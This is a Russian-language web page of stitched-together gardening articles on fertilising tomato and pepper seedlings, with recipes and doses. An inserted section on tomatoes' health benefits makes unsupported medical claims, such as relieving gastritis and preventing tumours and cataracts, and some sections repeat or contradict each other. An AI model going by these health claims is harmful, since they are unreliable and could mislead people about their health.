1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Каких веществ больше всего не хватает перцам и помидорам

Какие удобрения для рассады помидор и перцев требуются растениям

Качество овощей и их урожайность зависит не только от сорта, но и от того, какие удобрения для рассады помидор или перцев используются огородником.

Опытные специалисты точно знают, что и когда нужно давать растению для нормального развития и роста.

Ведь при нехватке определенных полезных компонентов растение очень часто и сильно болеет, бледнеет и умирает.

Розничная торговая сеть предлагает огромное количество мин. удобрений для подкормки саженцев, как правильно выбрать нужное – понятно далеко не каждому огороднику, особенно если он только начал выращивать овощи.

Когда нужно подкармливать молодые растения

Первый подкорм специалисты рекомендуют осуществить, как только из почвы появятся первые листики.

Это нужно делать особенно в тех случаях, когда огородник не имеет возможности создать для них идеально приемлемые условия.

Первая подкормка считается желательной, но не строго обязательной.

Как только саженцы немного подрастут, нужно осуществить пикирование – процесс пересадки ростков в отдельные «свои» лунки.

Очередную подкормку следует осуществить по истечении 10 суток после купирования. Если саженцам не требуется купирование, то следующая подкормка должна производиться не позднее срока, когда растение выкинет третий листик.

Третья должна производиться спустя 10 суток после второй. Последняя (в отношении саженцев) не позднее и не ранее чем через 10 суток перед высадкой в открытый грунт.

По сути, количество подкормок будет зависеть от сорта и условий содержания саженцев. Обязательными считаются две – при формировании третьего листика у саженца и перед посадкой на постоянное место вегетации.

После их можно поливать и удобрять разными составами, с учетом потребностей сорта и самого саженца и условий, где их взращивают.

Каких веществ больше всего не хватает перцам и помидорам

Любой огородник должен следить за своими саженцами, коль решил вырастить собственный урожай. Тем более что они обязательно дают знать хозяину, каких и когда именно веществ им не хватает:

  • Дефицит железа выражается в блеклости растения в явно выраженных прожилках на листве.
  • Азотное голодание выражается вялостью и желтизной листвы, которая в скором времени отпадает. Нехватка этого элемента сказывается и на росте саженца. Правда эта симптоматика может наблюдаться и при нарушении условий выращивания таких, как недостаток света, неправильно подобранном температурном режиме.
  • Дефицит фосфора перепутать с каким-либо иным очень сложно. Здесьботва куст обретает фиолетовый окрас.

Отталкиваясь от вышеизложенной информации, нетрудно понять какого минерала растению не хватает. Подкармливать саженцы нужно аккуратно и осторожно, чтобы не обжечь ростки.

Правила правильного подкорма перца и помидор

Есть определенный перечень правил подкормки рассматриваемых культур, которыми пренебрегать нельзя. При этом не важно, какие именно вносятся удобрения для рассады помидор и перцев – своими руками произведенные или покупные:

  • Подкармливать саженцы ими нужно рано утром или поздним вечером.
  • После подкормкипомидоры следует полить, используя чистую, не холодную воду. Это позволит удалить остатки смеси с листиков, предохранив их от ожога.
  • Грунт, который планируется пересадка, следует или лично удобрить и подготовить, или купить в специализированных магазинах уже готовый. Он должен выступать в роли основы подкармливания на протяжении всего периода вегетации.

Соблюдение этих простых, но очень важных требований поможет растения хорошо прижиться, а огороднику добиться хорошего урожая.

Как правильно подкармливать и ухаживать за помидорами

Для полноценного развития этой культуры потребуются разные удобрения:

  • Порошкообразный суперфосфат, как стимулятор роста
  • Комплексные удобрения из азота и калия
  • Органика для нормального развития куста, корня, цвета и плода

Любой организм на земле требует нормального сбалансированного питания, помидоры – не исключение. Для жизнеустойчивости, здорового и полноценного роста они должны быть вовремя и правильно подкормлены.

Высадка перечной рассады в почву

Место высадки саженцев нужно подготавливать осенью.

Нужно иметь в виду, что эта культура не приемлет перекорма.

Перед пересаживанием молодых растений на отрытую местность их следует немного присыпать золой.

При внесении ее в почву, не следует забывать о том, что она считается едким веществом, поэтому подсыпать ее в больших количествах не рекомендуется.

Зола не в силах обеспечить помидор всеми полезными веществами, очень хорошо поможет окрепнуть рассаде с тонким стеблем, чуточку повысит их пост.

Внекорневая подкормка, когда и как применяют

Этот вид особенно актуален для томатов. Поскольку эта культура хорошо впитывает влагу не только корневищем, но и листьями. Процедура осуществляется методом опрыскивания при помощи обычного садового пульверизатора. Состав готовится следующим образом: столовую ложку суперфосфатной смеси разводят литром воды.

Смеси дается время для настаивания(24 часа). Раствор тщательно процеживается, смешивается с 10 л воды. Используется для опрыскивания, по мере необходимости. Придерживаться каких-то графиков здесь вовсе не обязательно.

Подкармливать эту культуру нужно с момента пикировки. Очень положительно после данной манипуляции на растение действует гуматом натрия. Стимулятором роста томатов сможет послужить мочевина. Для хорошей приживаемости корневой системы перед высаживанием в открытую местность можно добавлять смесь мочевины и суперфосфата (по столовой ложке на ямку). После чего хорошо полить растения.

Очень неплохо зарекомендовала в качестве подкорма следующая смесь. Готовить ее очень просто, на 10 литров удобрений потребуется – суперфосфата – 20г; мочевины – 15 и хлористого калия – 15 г. Составом поливают растения на фазе второго подкорма.

Правильный уход саженцами перца

Правильный выбор грунта для этой культуры – половина дела.

Своевременный уход и правильная подкормка для перцев имеет большое значение.

Если грунт под ним вовремя обогащать и поливать, то перец ответит высокой урожайностью.

А ведь именно к этому стремится каждый огородник, решивший вырастить его у себя на участке.

Землю, перед высадкой перца из теплицы в на открытую территорию, нужно заблаговременно удобрить и подготовить. Как и в случае с помидорами.

Смесь для подкармливания следует подготавливать строго по рецептуре. Придерживаться золотой середины нужно обязательно. Ведь при недостатке полезных веществ растение будет плохо расти и погибнет, а при избытке может сгореть и точно также умереть. Особенно аккуратно следует работать с азотными удобрениями.

Огороднику-любителю, особенно начинающему, следует, знать о том, что удобрения, в котором присутствует фосфор очень нужны для перца. Этот элемент играет важную роль в формировании и росте куста. Их следует включить в подкорм в обязательном порядке.

Ростки перца нуждаются, в отличие от помидоров в двух важных для него питательных компонентах: фосфоре и азоте. А также в небольшом количестве калия:

  • Фосфор ему нужен для формирования куста и корня
  • Азот для полноценного формирования зеленой массы (листвы)
  • Разрешается и даже рекомендуется использовать кроме суперфосфатов аммиачную селитру. Как органику можно применить золу дерева, разведенной в настое крапивы в пропорциях 1:10. Хорошим удобряющим веществом для перца считается и обычный чай. Для приготовления этой подкармливающей смеси потребуется использованная заварка. Залить ее 3 литрами крутого кипятка, настаивают на протяжении 5 суток, затем, процеживают и получившимся раствором просто поливают саженцы.

Виды готовых удобрений и их важность для саженцев

Покупные удобрения делятся на: органику, комплексные и минеральные. Все они успешно используются огородниками для повышения урожайности. Состав и полезные компоненты удобрения для рассады помидор и перцев, купить которые можно в любом садоводческом магазине:

  • Минеральные составы впускаются в жидком либо порошкообразном виде. Быстрои полностью растворяются в воде. Содержат полезные соли и химические соединения, которые выступают в роли стимуляторов роста, активно участвуют в формировании куста, листьев, корней и плода. Снабжают полноценным питанием, облегчая труд истарания огородников.
  • Аммиачные и аммонийные призваны изменять состав грунта. Используются для окисления грунта. Состоят на 21 % из азота. Использовать их нужно осторожно, особенно при подкормке методом полива. Аммиачная селитра и мочевина считаются самыми главными смесями из группы азотных удобрений. Их состав состоит на 46% из чистого азота.
  • Фосфатные различают по содержанию компонентов и степени растворимости. Самый распространенный и используемый вид – суперфосфат. О его свойствах уже упоминалось выше.
  • Группа калийных удобрений – суспензии, в содержании которых имеются: хлористый калий, соли и сульфат калия. Смесь прекрасно растворяется в воде. Используется при подкормке методом полива.

Для каждого вида культур требуется свой вид комплекс, а потому очень важно разбираться в ассортименте, понимать, что именно нужно тому или иному растению. Понятно, что при покупке состава первое, на что нужно обращать внимание – это состав компонентов, из которых он состоит. Имеется в виду основной и добавки.

  • Для молодых саженцев нужна хелатная форма. Для развивающихся типов растений сульфаты не нужны и очень опасные. Кроме вреда они ничего им не смогут дать.
  • Если на упаковке стоит метка о том, что в составе содержится SO4 (сульфат), а средство выбирается для рассады, то нужно от него нужно отказываться.
  • Дозировка. Это второй важный аспект, на который следует обращать внимание. Производитель должен указывать на упаковке дозировку для взрослых растений и для саженцев по отдельности, если этого нет, то такое удобрение вызывает сомнение в качестве продаваемого продукта.

Приготовление удобрений собственными руками – народные методы подкормки

Рассаде помидор и перцев, для полноценного развития, особенно требуются соединения фосфора, калия и азота.

Об этом шла речь выше, их в огромном количестве предлагают торговые точки специализированных магазинов.

Опытные огородники на практике используют источники этих полезных веществ, найденных в природной среде.

Ими пользовались наши предки, в итоге в народ ушла масса рецептов, передающиеся из одного поколения к другому.

Самые простые и действенные стали популярны и в современном огородничестве:

  • Птичий помет. Знаменитый источник одного из главных компонентов подкормки – азота. Используется на первых фазахподкормки. Состав готовят следующим так: берется часть помета, смешивается с 2-мя частями воды. Суспензию оставляют на 3 суток для брожения. После чего раствор процеживается, разводится ведром воды (10 л) и используется по назначению.
  • Зола. Природный источник калия и фосфора. Подкорм этим средством осуществляют в период, когда саженец готовят к высадке из теплицы в огород. Особенно богата на упомянутые элементы зола из древесины и соломы. Народное удобрение на основе золы готовят так: берут столовую ложку золы, разводят ее в 2 литрах горячей воды. Процеживают и поливают растения для хорошего цветения, роста и плодоношения.
  • Банановые шкурки. Очень богатые на калий. Его дефицит приводит к тому, что саженец теряет упругость, плохо усваивает азот, становится вялым. Чтобы избежать этой проблемы саженцы поливают составом, приготовленным по следующей рецептуре: в 3-х литровую банку с водой помещают кожуру 2-3 бананов, настаивают трое суток. Этого времени будет вполне достаточно, чтобы кальций из шкур «перебазировался» в воду, сделав ее отличным удобрением для помидор и перца.
  • Настой из яичной скорлупы. Скорлупа из куриных яичек считается кладезю полезных минералов, полезных веществ для растений. Настой на скорлупе способствует росту, поэтому ее очень актуально использовать при выращивании рассады. Готовится средство так: берется 3-литровая банка теплой (не горячей воды) в нее добавляется скорлупа из 3 яичек. Сосуд плотно закрывается крышкой и настаивается в течение 3 суток. Специфический запах сероводорода свидетельствует о том, что удобрение готово к использованию.
  • Кофейная гуща. Остаток (гуща) от кофе считается отличным природным источником микро- и макроэлементов. Она разрыхляет грунт, обеспечивая корневой системе свободный доступ кислорода. Все что необходимо сделать огороднику, используя кофейную гущу в качестве удобрения – смешать ее с грунтом в период пересадки растений.
  • Луковая шелуха. Прекрасный способ подкормки, наделенный двойным эффектом. Настой, приготовленный на шелухе, выполняет двойную роль в жизнедеятельности помидор и перца: питает полезными веществами, обеззараживает листву при опрыскивании. Готовится настой просто: в сосуд, емкостью в 5 литров, в него добавляют 20 граммов шелухи, оставляют на 4 суток. Перед использованием процеживают.
  • Отвар из картофеля с сахаром. Если после приготовления картофели остался отвар, им можно полить рассаду. В его составе содержится много полезных для растений веществ. Приготовить похожий отвар можно, проварив в воде картофельные очистки. Близка по составу вода после замачивания бобовых культур и простой крупы.
  • Добавив в почву, в момент высадки саженцев в отрытом пространстве, щепотку сахара из свеклы, можно обеспечить растениям хорошую стимуляцию для роста. Сделать это можно и при поливе, но не чаще 1 раза в 7 дней.

Подкормка саженцев помидор и перца природными удобрениями поможет повысить урожай. Причем в отличие от покупных народные составы, абсолютно безвредные для ростков. Главное вовремя и в нужных количествах их добавлять. Еще одно преимущество их использование – полная доступность, никаких вложений они не требуют и стопроцентно есть в арсенале каждой хозяйки.

На видео – подготовка рассады перцев, томатов, баклажанов к посадке:

Заметили ошибку? Выделите ее и нажмите Ctrl+Enter, чтобы сообщить нам.

Почему хочется помидоров? Свойства продукта и его польза для организма

Помидоры – растения, которые относятся к семейству пасленовых. К этой категории также причисляют картофель, баклажаны и перец. Данный продукт употребляют в разных видах. Его едят сырым, тушеным, жареным и запеченным. Овощ добавляют в первые блюда и салаты, используют в качестве гарнира. В статье говорится о том, почему хочется помидоров, а также о пользе и вреде кушанья для организма.

Положительные свойства томатов

Эти плоды содержат много пищевых волокон. Регулярное употребление таких овощей способствует нормализации функций желудка и кишечника, выведению токсичных соединений из клеток тела. Томатный сок с добавлением мякоти является натуральным действенным средством против задержки стула. Говоря о пользе помидоров для организма человека, следует отметить, что это кушанье помогает уменьшить уровень артериального давления и избежать развития гипертонической болезни. Кроме того, употребление такого овоща способствует улучшению состояния пациентов, страдающих гастритом с пониженной кислотностью. Два стакана сока томата перед приемом пищи позволяет избавиться от симптомов недуга.

Помидоры содержат вещества, делающие кровь более жидкой. Продукт позволяет избежать образования тромбов. Томаты благотворно воздействуют на функции органов мочевыделения, способствуют повышению потенции. Овощ также содержит вещества, препятствующие развитию патологий миокарда и злокачественных опухолей.

Почему хочется помидоров в период вынашивания плода? Будущие мамы нередко интересуются данным вопросом. Дело в том, что вещества, которые входят в состав томатов (например, витамин А и фолиевая кислота) очень важны для нормального формирования плаценты, роста эмбриона и протекания процесса беременности. Организм женщины испытывает в них особую потребность.

Другие полезные качества

В мякоти томатов присутствует триптофан. Это вещество представляет собой аминокислоту, из которой в теле человека образуется серотонин. Почему хочется помидоров часто? Возможно, дело в недостатке «гормона счастья» в организме. Серотонин оказывает положительное воздействие на функции желудка и кишечника, нервной системы, нормализует процесс свертывания крови, помогает предотвратить эмоциональную нестабильность, приступы гемикрании, депрессивное состояние и многие другие душевные расстройства.

Употребление томатов в свежем виде защищает кожные покровы от вредного влияния солнечных лучей и раннего старения. Мякоть этих плодов является народным методом терапии ожогов, язвочек и ран. Овощи оказывают противовоспалительное действие. Специалисты часто рекомендуют своим пациентам включать в рацион блюда из томатов.

Сок из помидоров способствует предупреждению малокровия. Вещества, входящие в состав мякоти плодов, благотворно влияют на состояние глаз, предотвращают развитие патологий зрительного аппарата и помогают избежать катаракты, миопии и дальнозоркости даже в преклонном возрасте. Кроме того, употребление томатов полезно для деятельности мозга и печени. Блюда из этого овоща помогают справиться с повышенной усталостью. Почему хочется помидоров? Тяга к томатам может быть вызвана дефицитом веществ, которые содержатся в мякоти плодов.

Состав продукта

Помидоры относятся к полезной и низкокалорийной пище. Энергетическая ценность 100 грамм составляет всего 20 ккал. Следовательно, такое кушанье можно смело употреблять тем, кто стремится сохранить стройность фигуры.

Сколько витаминов в помидоре? Не менее пяти. Кроме того, томаты содержат много других полезных соединений. В состав овощей входит:

В каких случаях употребление продукта нежелательно?

В состав этих овощей входит большое количество органических кислот. Блюда, приготовленные из томатов, нельзя часто есть пациентам, страдающим ЖКБ, артритом, патологиями мочевыделительной системы, воспалением поджелудочной железы, подагрой. Помидоры при гастрите с повышенной кислотностью также противопоказаны. Гипертоникам и пациентам с недугами сердечной мышцы запрещено употреблять эти овощи в соленом и маринованном виде. Кроме того, не следует забывать, что томаты нередко провоцируют индивидуальную непереносимость. Поэтому людям, склонным к аллергии, надо исключить их из своего рациона.

По мнению специалистов, помидоры нельзя сочетать с такими видами пищи, как: мясо, хлеб, яйца и рыба.

Правила употребления

Томаты – это продукт, который обладает множество положительных свойств. Чтобы овощи приносили организму только пользу, необходимо соблюдать несколько важных рекомендаций. Почему хочется помидоров? Тяга к этому продукту обусловлена нехваткой веществ, которые важны для хорошего самочувствия и нормального протекания процесса беременности.

Специалисты утверждают, что лучше отдавать предпочтение свежим плодам. Из них рекомендуется готовить разные блюда. Консервированные томаты можно есть в малых количествах. Помидоры, выращенные весной или зимой, покупать не рекомендуется. Эти плоды, скорее всего, содержат химикаты. Также не следует выбирать овощи, которые были собраны зелеными.

Удобрения для рассады томатов и перца

Сочные помидоры и ароматные перцы культивируют практически все дачники. Но при выращивании рассады они порой упускают такой момент, как подкормка. Проводить это мероприятие нужно правильно, поскольку на этапе рассады овощи наиболее уязвимы.

Когда подкармливать рассаду?

«Перекармливать» всходы томатов и перца опытные аграрии не рекомендуют. Лишние питательные компоненты причиняют саженцам больший вред, нежели дефицит. Оптимально использовать удобрения для рассады томатов и перчика при ее плохом внешнем виде – слабости и чахлости. Если растения развиваются нормально, они имеют крепкие стебли и сочные зеленые листья, а значит, не нуждаются в подпитке.

Слишком заботливый дачник может испортить культуру внесением ненужного в этот период азота. Переизбыток вещества погонит рассаду в рост, побуждая выпускать новые побеги и зелень. Но высокого урожая пышные кустики давать не будут.

Как и чем подкармливать перец

Перец предпочитает влажную теплую среду и плодородные почвы. Недостаток питательных элементов делает растение хилым и безжизненным, оно сбрасывает цветки и завязь.

Первый раз подкармливать перец принято, когда на рассаде появляется по два полноценных листика. Вносят минеральные удобрения или водный раствор прелого навоза. Свежие фекалии животных использовать запрещено, т. к. они сжигают корни рассады.

Для первой подкормки перечной рассады препаратами огородники применяют такую продукцию:

  • Калий – 1 г;
  • Суперфосфат – 3 г;
  • Селитра аммиачная – 0.5 г;
  • Вода отстоявшаяся – 1 л.

В дальнейшем концентрацию веществ удваивают и вносят растворы с периодичностью 1 раз в 10 – 15 дней.

Когда и чем удобряют томаты

Первичная подкормка рассады томатов после пикировки осуществляется, если прошло 2 недели со дня прищипки кончиков главных корней и размещения всходов по разным горшочкам. Питательную смесь готовят на свое усмотрение, разбавляя компоненты 1 л воды.

  1. Вариант первый: 1.5 г калийной соли + 0.5 г мочевины + 4 г Суперфосфата.
  2. Вариант второй: 2 г сернокислого калия + 0.6 г аммиачной селитры + 4 г Суперфосфата.

Понять, каких веществ не хватает рассаде, дачникам помогут сами растения. Изменением своего внешнего вида они сигнализируют о том, чего конкретно им не хватает для развития. Например, при дефиците железа листья рассады бледнеют и на них четко выделяются зеленые прожилки. При нехватке фосфора всходы приобретают фиолетовый оттенок. Недостаток азота приводит к увяданию, пожелтению и опаданию листьев рассады томатов. Саженцы, недополучающие азот, растут очень медленно.

Решая, чем подкормить рассаду помидор после пикировки, дачник должен знать, что во второй раз лучше использовать мочевину. 1 ст. л. вещества разводят в 10 л чистой воды и обильно поливают саженцы.

Третий раз удобрением пикированной рассады томатов занимаются, применив Нитрофоску. Раствор делают из 1 ст. л. минерального удобрения и 1 л чистой воды. Полученной порции хватает на большое количество растений.

Каждая последующая подкормка рассады помидор осуществляется по мере надобности. Отличным вариантом послужит компост – его просто подсыпают в ящики. Внекорневые подкормки устраивают, распыляя из пульверизатора раствор Суперфосфата и горячей воды (1 ст. л. на 1 л). Препарат настаивают ровно сутки. Слитую жидкость разбавляют водой до получения общего объёма 10 л и опрыскивают рассаду.

Чем подкормить рассаду помидор чтобы были толстенькие

Правильное внесение полезных веществ гарантирует получение урожая крупных сочных овощей. Поэтому чем подкормить рассаду помидор чтобы были толстенькие сначала стебли, а затем и сами плоды, должен знать каждый хозяин. Распространенным способом подкормки в домашних условиях является применение дрожжей. Спрессованные дрожжи разводят теплой водой из расчета 10 г на 10 л. Поливают этой смесью рассаду 3 раза за весь период ее роста. Насаждения смогут быстрее расти и давать в будущем толстые мясистые помидорчики.

Подкармливать рассаду для получения крупных томатов можно и йодом, но не чаще 1 раза в 2 недели. 10 капелек йода, немного калия и фосфора добавляют в чистую воду (1 ведро). Пол литра раствора – это порция для одного куста. Питательную жидкость льют на землю, не задевая растение. Иначе йод его испортит.

Но проще всего удобрять рассаду помидор навозом. Подкормку делают 1 раз в 2 недели или реже. Готовят удобрение, размешав ведро навоза в 3 ведрах воды. Состав настаивают сутки, затем под каждый куст льют по полведра подкормки. В результате культура обогатится минеральными веществами и порадует в конце сезона крепкими сочными плодами.

Удобрение рассады народными средствами

Если вы не умеете работать с химикатами или у вас нет возможности достать навоз, не беда – подкормка рассады томатов и перца народными средствами не является сложной наукой. Вы запросто освоите ее самостоятельно. Для начала насобирайте скорлупы с 2 – 3 яиц, помойте и высушите ее, затем заверните в тонкое полотенце и раздробите скалкой. Высыпьте порошок в 3-литровую бутыль с водой и дайте банке постоять 3 дня, но периодически встряхивайте содержимое. Процедите и разбавьте настой водой в соотношении 1: 3. В процессе настаивания жидкость обогащается магнием, железом, фосфором, кальцием и калием.

Если ваши домочадцы любят бананы, попросите их не выбрасывать кожуру. Ароматные шкурки, снятые с 4 плодов, засушите или используйте в свежем виде. Измельчите сырьё и залейте 3 л теплой воды. Пусть посудина постоит несколько дней в условиях комнатной температуры. Отфильтруйте настой и разведите чистой водичкой 1: 1. Сухой порошок из банановых шкурок вносите в почву в момент рыхления.

В продолжение темы «Чем подкормить рассаду перца и помидор» рассмотрим рецепт с луковой шелухой. Полезные свойства лука для молоденьких растений заключаются в обогащении грунта микроэлементами и дезинфицирующем эффекте. Удобрять луковыми очистками можно любые сорта перца, помидор, капусты и огурцов.

Как приготовить полезный продукт:

  1. Два стакана луковой шелухи заливают 5 л воды;
  2. Посуду ставят на огонь и дожидаются закипания ингредиентов;
  3. Распаренный лук отделяют от воды и остужают;
  4. Подкормку выкладывают на грядки.

Как подкормить перец и томаты дрожжами и золой:

  1. Сухие дрожжи и золу (10 г и пол литровая баночка) размешивают в воде (12 л);
  2. Продукт дополнительно разводят водой 1: 5 и поливают всходы.

Второй вариант: размешать 100 г золы в большом ведре воды и дать средству постоять несколько часов. В дальнейшем его можно использовать для полива растений.

Отличное удобрение для рассады помидор и всходов перца получается из крапивы. Его можно лить под корень, а можно полезной водичкой опрыскивать листья саженцев. Возьмите пучок крапивы без семян и залейте 10 л воды в удобной посуде. Крапивный настой должен отстояться несколько дней. Затем разбавьте его водой до светло-желтого оттенка и используйте для полива всходов.

Выбирая, чем удобрять перечную или помидорную рассаду, обратите внимание на вариант с кофейной гущей. Промойте и просушите эту массу и вносите ее в открытый грунт или посадочную тару. Кофейное удобрение насыщает землю азотом и кислородом и разрыхляет ее. В таких условиях всходы быстрее тянутся вверх.

Полезные советы

Планируя выращивать перец и помидоры рассадой, заранее купите грунт, обогащенный питательными веществами. В дальнейшем учитывайте, что всходы лучше воспринимают подкормку в утренние и вечерние часы. Всякий раз после внесения корневых удобрений поливайте саженцы чистой водой – это послужит профилактикой ожогов.

Чем подкормить рассаду помидоров и перца в домашних условиях, удобрения

Вырастить помидоры, перец или другие овощные культуры в домашних условиях на сегодняшний день вполне реально. Не беда, если у вас нет дачного участка — альтернативой могут стать подоконники и балконы, где любой может разбить мини-огород.

Главное — желание вырастить овощи собственными руками и подать ароматные и вкусные культуры прямо с грядки на стол.

Для того чтобы помидоры и перец, сегодня мы поговорим именно о них, давали стабильный и большой урожай, прежде всего необходимо подобрать хорошие семена, затем правильно подготовить их к посеву и вырастить хорошую рассаду.

Но при выращивании рассады любители-огородники порой упускают такой момент, как подкормка, который нужно проводить правильно, поскольку овощи наиболее уязвимы на этапе рассады.

В целом, выращивают рассады помидоров и перца в принципе почти по одинаковой методике. И помидоры, и перцы — теплолюбивые культуры, хорошо растут в питательной почве, не переносят засухи, и хорошо реагируют на подкормки, хотя есть и некоторые различия, о которых нужно помнить при уходе за рассадой этих овощей.

Как подкармливать рассаду помидоров

Каждый огородник должен знать, чем подкормить рассаду помидоров, чтобы сначала стебли рассады, а потом и сами плоды были толстенькими, так как правильный подбор минералов гарантирует получение хорошего урожая.

В первый раз подкармливают рассаду томатов в домашних условиях не ранее чем у сеянцев появятся первые настоящие листья. После этого вносить удобрения можно спустя две недели после пикировки.

Последний раз подкормить рассаду следует за 10 дней до ее высадки в открытый грунт или в теплицу. В некоторых случаях может понадобиться внеплановое удобрение помидоров, к примеру, если рассада плохо растет и у нее наблюдается дефицит определенного вещества.

Для первой подкормки рассады помидоров используют комплексные удобрения, с преобладающим содержанием азота. Питательную смесь можно приготовить, растворив 1,5 грамма калийной соли, 0,5 грамма мочевины и 4 грамма Суперфосфата в одном литре воды. Вторую смесь готовят, растворив в одном литре воды 2 грамма сернокислого калия, 0,6 грамма аммиачной селитры и 4 грамма Суперфосфата.

При второй подкормке лучше использовать мочевину – растворив одну столовую ложку вещества в 10 литрах чистой воды. В третий раз удобрением пикированной рассады томатов занимаются, применив препараты, содержащие азот, калий и фосфор.

Как подкармливать рассаду перцев

Рассада перца – одна из самых непредсказуемых в выращивании. Молодые побеги растения, которое еще вчера выглядели нормально, неожиданно друг засыхают или даже полностью вянут.

Опытные садоводы и огородники считают, что обычно это происходит из-за нехватки питания, и если срочно подкормить рассаду перчиков, то вполне возможно ее спасти. Но лучше конечно не доводить до кризисных ситуаций и начинать подкормки заранее, которые следует продолжать на протяжении всего периода вегетации.

Подкармливать рассаду перца можно комплексным минеральным удобрением, в состав которого входят азот, фосфор и калий. Азот необходим для наращивания зеленной массы стебля, а фосфор – для мощной корневой системы. Калий в это время перец или вообще не использует, или использует в очень малых количествах.

При подкормке этим удобрением рассады нужно использовать раствор в соотношении половины спичечного коробка на 10 литров воды. Если вам нужно меньше раствора – можете приготовить нужное количество исходя из этого расчета.

Подкормка бывает двух видов – корневая и внекорневая. В первом случае подкормку выливаем под корень, во втором случае – обрызгиваем из пульверизатора листовую массу.

В первый раз нужна именно корневая подкормка, так как в этот период развивается корневая система и нужно, чтобы вся питательная масса попала к корням и к листьям.

Побаловать рассаду перчиков, чтобы они были толстенькие и мясистые рекомендуется азотно-калийной подкормкой.

Питательный коктейль готовят по следующей схеме — один грамм мочевины, восемь грамм суперфосфата и три грамма калия сернокислого растворяют в двух литрах воды, а перед поливом землю в горшках посыпают золой.

В дальнейшем концентрацию веществ удваивают и вносят растворы с периодичностью один раз в 10-15 дней.

Удобрения для томатов и перцев

Проще всего удобрять рассаду томатов и перцев навозом. Готовят удобрение, размешав ведро навоза в 3 ведрах воды. Состав настаивают сутки, а затем поливают каждый кустик. Подкормку делают один раз в две недели или реже. В результате рассада обогатится минералами и порадует вас в конце сезона толстенькими сочными помидорами и перцами.

Подкармливать рассаду для получения толстеньких помидоров или перцев можно и йодом, но не чаще одного раза в две недели. Для этого добавляют в чистую воду из расчета 10 капель йода, немного калия и фосфора на одно ведро. Порция для одного куста составляет пол литра раствора.

При этом нужно помнить, что раствор льют на землю, не задевая растение, иначе йод его испортит.

Народные средства

Если вы против использования химикатов или у вас нет возможности достать навоз, для подкормки рассады томатов и перца можете воспользоваться народными средствами. Для этого, одну столовую ложку древесной золы растворить в двух литрах горячей воды. Перемешать, настоять сутки, затем процедить, оставляя осадок на дне и использовать для подкормки томатов и перцев.

Для подкормки рассады овощей можно использовать и яичную скорлупу. Возьмите скорлупу двух-трех яиц, помойте и высушите, затем заверните в тонкое полотенце и раздробите скалкой. Полученный порошок нужно высыпать в трехлитровую банку с водой и дать настояться три дня, периодически взбалтывая содержимое.

Через три дня содержимое банки, которое обогатилось магнием, железом, фосфором, кальцием и калием, процедите и разбавьте настойку с водой в соотношении один к трем.

Шелуха репчатого лука обогащает дезинфицирует грунт и обогащает его микроэлементами, что очень полезно для молоденьких растений. Удобрять луковыми очистками можно любые сорта перца, помидор и других овощных культур.

Подкормить молодые всходы можно и крапивной настойкой — возьмите пучок крапивы без семян, залейте 10 литрами воды и оставьте на несколько дней. Затем разбавьте его водой до светло-желтого оттенка и используйте для полива всходов.

Вариант с кофейной гущей также заслуживает внимания при выборе подкормки для помидорной или перечной рассады. Кофейную гущу следует промыть, просушить и добавлять в открытый грунт или посадочную тару. Кофейное удобрение насыщает землю азотом и кислородом и разрыхляет ее. В таких условиях всходы, которые плохо растут, быстрее тянутся вверх.

Ароматные шкурки бананов также можно использовать для подкормки растений. Для этого четыре шкурки плодов засушите или используйте в свежем виде. Сырье измельчите и залейте тремя литрами теплой воды и оставьте на несколько дней – пусть настоится. Затем настойку нужно отфильтровать и разбавить водой один к одному.

Сухие шкурки бананов можно измельчить в порошок и добавлять в почву в момент рыхления.

Полезные советы

Планируя выращивать перец и помидоры рассадой, заранее купите грунт, обогащенный питательными веществами.

Подкармливать рассаду следует или в утренние, или вечерние часы.

После внесения корневых удобрений поливайте саженцы чистой водой – это послужит профилактикой ожогов.

Опытные огородники рекомендуют не перекармливать всходы помидоров и перцев — лишние питательные компоненты причиняют саженцам больший вред, нежели дефицит. Поэтому золотое правило огородников – лучше не докормить, чем перекормить.

Удобрения для рассады томатов и перца следует использовать при ее плохом внешнем виде – слабости и чахлости. Если растения развиваются нормально, они имеют крепкие стебли и сочные зеленые листья, а значит, не нуждаются в подкормке.

Помните, что внесением ненужного в этот период азота можно испортить культуру — переизбыток вещества погонит рассаду в рост, побуждая выпускать новые побеги и зелень, но высокого урожая пышные кустики давать не будут.

Не забывайте наблюдать за внешним видом растений — если на ростках появятся какие-либо признаки увядания, значит нужно сменить состав минеральных смесей.

А каких веществ не хватает растениям можно узнать по следующим признакам – например, нехватка азота приводит к осветлению нижних листьев.

Светлые верхние листочки указывают на недостаток железа, увядание листьев – на нехватку меди, а фиолетовые прожилки на листьях – на недостаток фосфора.

При появлении этих признаков, необходимо провести внеочередную подкормку с повышенным содержанием нужного минерала.

Материал подготовлен на основе открытых источников

Чего не хватает томатам?

Добавление статьи в новую подборку

Недостаток питательных веществ легко спутать с заболеваниями или деятельностью вредителей. Узнайте, как можно «на глаз» определить, каких микроэлементов не хватает томатам.

Бывает, что мы делаем для овощей все: обеспечиваем их достаточным количеством света, тепла и влаги, а они растут чахлыми, невзрачными, дают мало урожая и слабо вегетируют. Что происходит с любимой культурой и чего ей обычно не хватает? Как правило, все сводится к нехватке одного или нескольких необходимых для роста и развития компонентов. Итак, как определить, что томаты недополучают важные вещества в процессе жизнедеятельности?

Недостаток азота

Симптомы хлороза являются следствием дефицита азота. Вначале листья мельчают, истончаются, а их рост замедляется. На прожилках и листьях начинает преобладать светло-красный цвет. При азотном голодании старые листья меняют цвет с нормального зеленого до бледно-зеленого оттенка. По мере усиления дефицита зрелые листья становятся желтыми, а при остром хлорозе − желтовато-белыми.

Молодые листья в верхней части растения остаются бледно-зелеными, но перестают расти и даже уменьшаются в размере. Ветвление происходит не так активно, как раньше, в результате чего растение быстро становится хилым и уже не способно плодоносить. Стебли твердеют, становятся волокнистыми и постепенно приобретают такой же темно-красный оттенок, как и листья. Листья, особенно при нерегулярном поливе, начинают быстрее стареть и осыпаться.

Выручит удобрение на основе нитрата калия, аммиачная селитра, мочевина, сульфат аммония, но процесс восстановления займет продолжительное время. О результатах можно будет судить по внешнему виду.

Дефицит фосфора

При нехватке фосфора на листьях появляются некротические пятна, создаваемые омертвевшими участками. Как правило, симптомы недостатка фосфора трудноразличимы и их можно спутать с заболеваниями. Причины фосфорного голодания вызваны тем, что удобрения из этого элемента плохо растворяются, да и вообще его не так много присутствует в удобрениях и компонентах, которые обычно вносят в почву.

